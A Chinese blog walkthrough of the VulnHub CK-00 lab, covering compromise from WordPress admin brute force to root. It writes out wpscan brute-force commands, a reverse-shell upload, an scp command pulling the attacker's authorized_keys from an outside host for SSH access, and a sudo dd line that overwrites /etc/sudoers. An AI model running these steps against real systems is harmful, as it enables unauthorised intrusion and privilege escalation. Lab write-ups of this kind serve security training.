当前位置: 首页 > news >正文

CK-00靶机详解

CK-00靶机详解

靶场下载地址:https://download.vulnhub.com/ck/CK-00.zip

这个靶场扫描到ip打开后发现主页面css是有问题的,一般这种情况就是没有配置域名解析。

我们网站主页右击查看源代码,发现一个域名。

image-20230725205856051

把域名添加到我们hosts文件中。

image-20230725205950458

目录扫描时候发现这是一个wordpress的网站,两个登陆页面,都是一样的。

image-20230725205830886

wpscan可以扫描出wordpress的登陆用户名。

wpscan --url http://ck --enumerate u

image-20230725210142587

这时候我们扫出来一个用户名叫做admin

image-20230725210158051

然后根据这个用户名爆破一下。

wpscan --url http://ck -U admin -P /usr/share/wordlists/rockyou.txt

image-20230725210321398

大概两分钟密码就出来了,账号密码都是admin

image-20230725210551676

我们登陆上wordpress的后台,这个位置是一个插件,这里可以上传php文件,我们可以上传一个反弹shell。

image-20230725211702587

image-20230725211721246

这个目录通常是wordpress上传上来文件的位置。

image-20230725211531575

打开一下我们的反弹shell文件。

image-20230725211758654

kali中监听一下,这边就拿到了一个web shell。

利用python3拿到一个稳定的shell。

python3 -c "import pty;pty.spawn('/bin/bash')"

image-20230725211916041

通常wordress都有一个配置文件,里面有数据库的账号密码。

image-20230725212801749

在这里面找到一个账号密码,这个密码不是root用户的密码

image-20230725212850922

但是发现这个密码能进去bla用户。

bla_is_my_password

image-20230725214653741

sudo -l发现这个用户可以以bla1用户的身份执行scp命令。

image-20230725214822551

这里我们看一下,在bla1目录下是没有.ssh文件的,当我们用scp命令拷贝我们kali中的一个文件时候,它会先私钥验证看看能不能拷贝,所以就在这里面自动创建了一个.ssh目录。

我们可以把我们kali的authorized_keys文件拷贝到靶机的这个.ssh中去就可以免密登陆这个用户了。

image-20230725215328064

这里我们拷贝到这个新出现的.ssh目录中去。

sudo -u bla1 /usr/bin/scp root@192.168.102.129:/root/.ssh/authorized_keys .ssh/

image-20230725221244148

然后用我们kali的私钥就可以登陆bla1用户了

image-20230725221310028

sudo -l后发现bla1用户可以免密执行ck-00用户的rbash.

这里我们就可以拿到ck-00用户的rbash了。

image-20230725221416628

拿到ck-00的rbash后sudo -l发现可以免密以root权限执行dd命令。

image-20230725222051890

dd命令可以往一个文件中写东西,以覆盖的方式。

这时候我们直接给bla用户所有的权限,写到sudoers文件中,bla用户就有全部的权限了,可以直接提权。

echo "bla  ALL=(ALL:ALL) NOPASSWD:ALL"|sudo dd of=/etc/sudoers

image-20230725222117743

我们登陆上bla用户直接提权发现拿到了root权限。

image-20230725222145786

http://www.lryc.cn/news/101230.html

相关文章:

  • 17-C++ 数据结构 - 栈
  • Redis如何实现排行榜?
  • Pycharm debug程序,跳转至指定循环条件/循环次数
  • react实现markdown
  • HTTP请求走私漏洞简单分析
  • BI-SQL丨两表差异比较
  • ZooKeeper 选举的过半机制防止脑裂
  • 【图论】树上差分(边差分)
  • RT1052的定时器
  • opencv python 训练自己的分类器
  • 详解Mybatis之分页插件【PageHelper】
  • 【基于矢量射线的衍射积分 (VRBDI)】基于矢量射线的衍射积分 (VRBDI) 和仿真工具(Matlab代码实现)
  • 基于jackson对bean的序列号和反序列化
  • 排队理论简介
  • 极速查找(3)-算法分析
  • http 常见的响应状态码 ?
  • 机器学习笔记之优化算法(四)线搜索方法(步长角度;非精确搜索)
  • Redis 哨兵 (sentinel)
  • 统计2021年10月每个退货率不大于0.5的商品各项指标
  • 【小波尺度谱】从分段离散小波变换计算小波尺度谱研究(Matlab代码实现)
  • UE5、CesiumForUnreal加载无高度地形
  • 关于Spring中的@Configuration中的proxyBeanMethods属性
  • dp1,ACM暑期培训
  • 大厂程序员的水平比非大厂高很多嘛?
  • Java开发工具MyEclipse发布v2023.1.2,今年第二个修复版!
  • 基于正交滤波器组的语音DPCM编解码算法matlab仿真
  • VS2022和QT混合编程打包发布程序
  • Filebeat学习笔记
  • 【实战】 九、深入React 状态管理与Redux机制(一) —— React17+React Hook+TS4 最佳实践,仿 Jira 企业级项目(十六)
  • 第九十五回 如何使用dio的转换器